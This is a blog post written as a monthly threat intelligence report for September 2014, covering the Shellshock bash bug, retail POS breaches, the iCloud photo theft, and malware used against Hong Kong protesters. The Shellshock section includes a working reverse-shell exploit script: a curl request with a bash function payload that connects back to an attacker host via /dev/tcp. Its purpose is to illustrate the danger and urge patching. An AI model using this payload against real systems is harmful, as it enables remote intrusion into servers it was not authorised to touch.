Krypt3ia

(Greek: κρυπτεία / krupteía, from κρυπτός / kruptós, “hidden, secret things”)

GLOBAL THREAT INTELLIGENCE REPORT: SEPTEMBER 2014

leave a comment »

photo

GLOBAL THREAT INTELLIGENCE REPORT: SEPTEMBER 2014

EXECUTIVE SUMMARY

During the month of September 2014 there were a number of incidents reported as well as stories of malware and crimeware. However, none of them compares in scope and threat to the bash bug that was released for all UNIX and Linux systems on the internet. The “Shellshock” bash vulnerability was released Wednesday 9/24/2014 and within a short time the internet was abuzz with alerts that all *NIX systems were vulnerable to this.

The bash bug is a real and present danger to systems that may misconfigured as well as those with the proper security features enabled. This is due to the fact that once the bug is exploited the attacker may then use other code to exploit the system further and thus compromise that machine. A further discussion of this bug and its import can be found below.

In other areas the global threat level is at a constant but with this new bash vulnerability and the issues surrounding it’s remediation the THREATCON LEVEL for this month post release of the Shellshock bug is at HIGH.

GLOBAL THREATS

SHELLSHOCK:

Shellshock: at its heart is a bug within the parser of the bash shell. The “bash” shell is the most common “command processor” in the UNIX and Linux systems we have today. The bug comes from the parser not stopping its function at the point where the command has been carried out but continues on and allows for arbitrary code to be run.

CVE-2014-6271: This is the original “Shellshock” Bash bug. When most people refer to the Bash bug or “Shellshock”, they are most likely talking about this CVE.

CVE-2014-7169: This is the CVE assigned to the incomplete patch for the original bug.

The original patch was found to be incomplete shortly after the vulnerability was publicly disclosed. A variation on the original malicious syntax may allow an attacker to perform unauthorized actions including writing to arbitrary files.

CVE-2014-7186 & CVE-2014-7187: These two CVEs are for bugs discovered in relation to the original Bash bug. These two bugs are triggered by syntax that is very similar to the original Bash bug, but instead of command injection, they allow for out of bounds memory access. There is currently no proof that these bugs have remote vectors and they have not been seen in the wild.

CVE-2014-6277 & CVE-2014-6278: Security researchers discovered two additional bugs. These two bugs are supposed to have the potential for arbitrary command injection, similar to the original Bash bug. However details have not been made public yet, in order to allow appropriate patches to be created.

ANALYSIS:

The primary issues around this vulnerability is simply this;

The bug could allow for code to be run on systems connected to the internet by anyone who can access them with and simply run code against them. This means all websites that run CGI/HTTP etc that run on UNIX/LINUX as well as any appliance (routers and other types) that have a web based or shell interface that can be accessed to pass the code to.

What this means is that no matter if you have the system locked down it may be possible, if the interface is available, to run 0day code or common commands that may cause the system to respond in ways that it was not meant to. An example of this that may impress the danger upon you is that with the right code, on a vulnerable system, one can create a reverse connection (AKA s shell session) to from your machine to the attacker with some very simple code.

Example Code:

#!/bin/bash

echo little shellshock CVE-2014-6271 cgi-bin reverse shell script by @jroliva

# step 1.- #nc -lp 8080 -vvv

# step 2.-  #./little-shellshock-reverse.sh localhostIP attackhostIP

/usr/bin/curl -A “() { foo;};echo;/bin/bash -i > /dev/tcp/$1/8080 0<&1 2>&1” http ://$2/cgi-bin/test.cgi

Once this code has been run you will have a connection to that machine to further exploit it remotely at your leisure. Additionally due to the nature of the bug and the variability of the code that could be exploited here we are still unsure of just where the boundaries are on attacks using this vulnerability.

Patching the systems with vendor patches is the primary fix to this and to date more patches are being released every day from large and small vendors to fix the parser and to stop the bug. However, you have to be vigilant and seek out all your systems within your environments that may have bash as their shell and insure that they can be patched. In some cases these systems may not have any code to be used to patch because they are out of date and the companies may not even exist any more.

This bug has already been seen used in the wild by APT actors as well as there are now malware versions out there using the bug to seek out and exploit machines automatically. It is recommended that if you have not begun attempts to assess all of your assets both internally and externally that you should do so as soon as possible. This exploit can now be detected by IDS systems signatures but unless they are blocked at the network level by an IPS you may be compromised and not be aware of it already.

Links:

http://www.tchnologyreview.com/view/531286/why-the-shellshock-bug-is-worse-than-heartbleed/

http://www.washingtonpost.com/blogs/the-switch/wp/2014/09/29/the-internet-is-still-shellshocked-by-latest-bug-but-it-wont-be-the-last/

http://www.wired.com/2014/09/shellshocked-bash/

Incidents:

Supervalu Reports Second Hacking Incident:

Supervalu, a grocery chain, has reported a second compromise to it’s payment systems this September. The first was reported on in August and now the second seems to be unrelated to the first incident and group.

These attacks both targeted the POS (Point Of Sale) systems within the stores and the net loss of credit cards according to Supervalu and authorities have yet to be released at this time.

ANALYSIS:

POS systems are notorious for being insecure. The reasons for this stem from not only the fact that the systems often need to be installed on computers with outdated Windows Xp on them but also in that they do not encrypt the data on the fly.

RAM scrapers are simple pieces of malware that sit in the memory of the POS system and just copy the data that is swiped in by the consumer at the terminal. This vulnerability is not new and has been leveraged by the carders who have been carrying out these attacks. These attacks will continue until such time as the POS terminals are secured at the application level and or the more secure “Chip and Pin” systems are implemented in the US as they already have been in the EU.

Links:

http://online.wsj.com/articles/customers-data-may-have-been-hacked-at-albertsons-acme-stores-1412027253

http://www.cbsnews.com/news/new-hack-attack-at-albertsons-supervalu-stores/

http://www.wired.com/2014/09/ram-scrapers-how-they-work/

“The Fappening”: (Celebrity Nudes Hacked from iCloud)

In August the release of nude photographs of famous women caused a sensation on line and in the news media. The photos and videos were all stolen from the Apple iCloud service that all iPhones and iPads use. The FBI has begun an investigation into the hacking incident that caused this and into the attackers who not only hacked into the iCloud but also released the photos online as a breach of privacy.

ANALYSIS:

The “Fappening” as the incident was named on Reddit and other sites within the DarkNet shows just how vulnerable we all are to compromising situations where technology is concerned. It is assumed by us all at some point that the data (i.e. photos and videos) are safe in the cloud storage that we upload to because companies like Apple are doing their due diligence in protecting that content. However, this incident shows that that may not always be the case and that your private and personal intimates may be open to anyone who can brute force a password.

The same analogy can be made for any cloud stored data that a company may be placing for safe keeping. It is important to consider the privacy and security aspects of all data a company or an individual may create and or allow you to hold for them. As such any company doing business holding or letting data be held should take pains to insure the due diligence on privacy and security. The Fappening is a cautionary tale where this all went wrong.

http://www.nytimes.com/2014/09/03/technology/trove-of-nude-photos-sparks-debate-over-online-behavior.html?_r=0

http://www.independent.co.uk/life-style/gadgets-and-tech/news/the-fappening-after-the-third-wave-of-leaked-celebrity-photos-why-cant-we-stop-it-9763528.html

CRIMEWARE AND MALWARE

FBI Opens Malware Investigator Portal to Industry:

The FBI has opened their malware analysis portal online for sharing with private industry. This site will be another in many types of information sharing that the government and private entities will be creating to help in the fight against malware and criminal activities. This portal will have malware samples, data on attacks and signatures to use in determining the attacks and the attacker characteristics.

The portal will also have a feature like malwr.com and cuckoo where you can upload a suspected file to it and allow a session to determine whether or not it is malware and just what it does after it infects a system.

http://www.zdnet.com/fbi-releases-malware-investigator-portal-to-industry-players-7000034186/

ANALYSIS:

The analysis of malware is an important feature in today’s information security program. Reliance only on technologies like AntiVirus is hubris and should be augmented with analysts who can test suspect files and links to insure whether or not they are a threat to the environment.

Often times AV products are on the back end of the curve where malware is concerned today and such tools like Cuckoo and Malwr.com are integral to a functioning IR (Incident Response) program at any company. That the FBI is allowing the use of this also adds value to the FBI in that they are getting live intelligence on potentially unseen malware from their user base.

Home Depot Reportedly Hit by New Malware In Recent Hack:

Home Depot reported in August that they had been hacked and their POS (Point Of Sale) systems were targeted. The hack was ongoing undetected for about 5 months and in that time the carders made away with approximately 56 million credit card numbers and attendant data.

On September 14th though the Unites States Secret Service reported that the malware that was used in this attack was a new variant never seen before. They named the malware “Mozart” However, others are claiming that the malware is in fact the same BlackPOS malware that was used in the Target hack that also stole large amounts of credit cards from their stores last year.

ANALYSIS:

The malware used in the attack on Home Depot is definitely linked to the Lampeduza collective who carried out the attack and sales of the Target data. Within the strings of the code for the mlware there are direct connections to the Lampeduza crew up to and including references to Libya and Ukraine and American meddling in such regions.

This sentiment is echoed in the sites that are affiliated with the Lampeduza group as well as a penchant for Libya and the late Muammar Khaddafi. Another factor here is that the malware fundamentally functioned identically to the BlackPOS malware usedf on Target.

http://online.wsj.com/articles/home-depot-was-hacked-by-previously-unseen-mozart-malware-1411605219

http://krebsonsecurity.com/2014/09/home-depot-hit-by-same-malware-as-target/

APT ACTIVITIES

Chinese Target Hong Kong Protesters iPhones with Malware:

Malware has been discovered affecting the protesters in Hong Kong that began protesting this week. This is a very targeted and rapid attack to attempt to control the protesters and perhaps arrest those who may be sympathetic to their cause.

ANALYSIS:

The malware dubbed “Xsser RAT” was installed by China on the protesters phones and is different than most because it not only affects Android phones but also iOS (Apple) phones as well but at this time no wild version that works has been seen. This cross platform malware has the ability, once installed on the phone, to see and capture everything that the user does on the phone.

Code within the malware has shown that it contains Chinese characters and reports back to a command and control that is under Chinese control. This is just another escalation in an ongoing battle over protests concerning a more free Hong Kong, something China does not necessarily want.

This incident serves as a parable on how advanced persistent threats can use weaponized code that they have already in their control to rapidly deploy and use against those they would wish to attack.

http://www.nbcnews.com/storyline/hong-kong-protests/hong-kong-protesters-phones-targeted-chinese-malware-experts-say-n215396

Putting TRANSCOM in Perspective

Today, the Senate Armed Services Committee released information indicating that China-based threat actors were heavily targeting TRANSCOM, the U.S. military’s logistics arm. In terms of the private sector contractors impacted, the intrusions detailed in the Levin report mirror activity FireEye has observed: we frequently see nation state threat actors target not only government, but also private sector organizations in order to obtain military intelligence.

ANALYSIS:

Fireeye put out a blog post after the US DOD put out a report on attacks that were carried out by APT actors against defense base companies. This is not necessarily news but the fact remains that not only the defense base has been a target of late of nation state actors.

While APT (Advanced Persistent Threats) are prevalent it is important to know that they are targeting anything and everything that may be of interest to them. This means now that public systems as well as corporations are now potential targets. As such, it is important that all companies take the time to understand what all of this means, how these actors carry out their attacks, and how one can protect against these attacks.

http://www.fireeye.com/blog/technical/2014/09/putting-transcom-in-perspective.html

I have also created a word format of this document with a section where you can put in your own metrics. Use this document to give your executives a threat intelligence report and hopefully enlighten them on what is going on out there.

LINK TO WORD FORMAT OF THIS DOCUMENT: HERE

Written by Krypt3ia

2014/10/01 at 20:28

Posted in Uncategorized

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: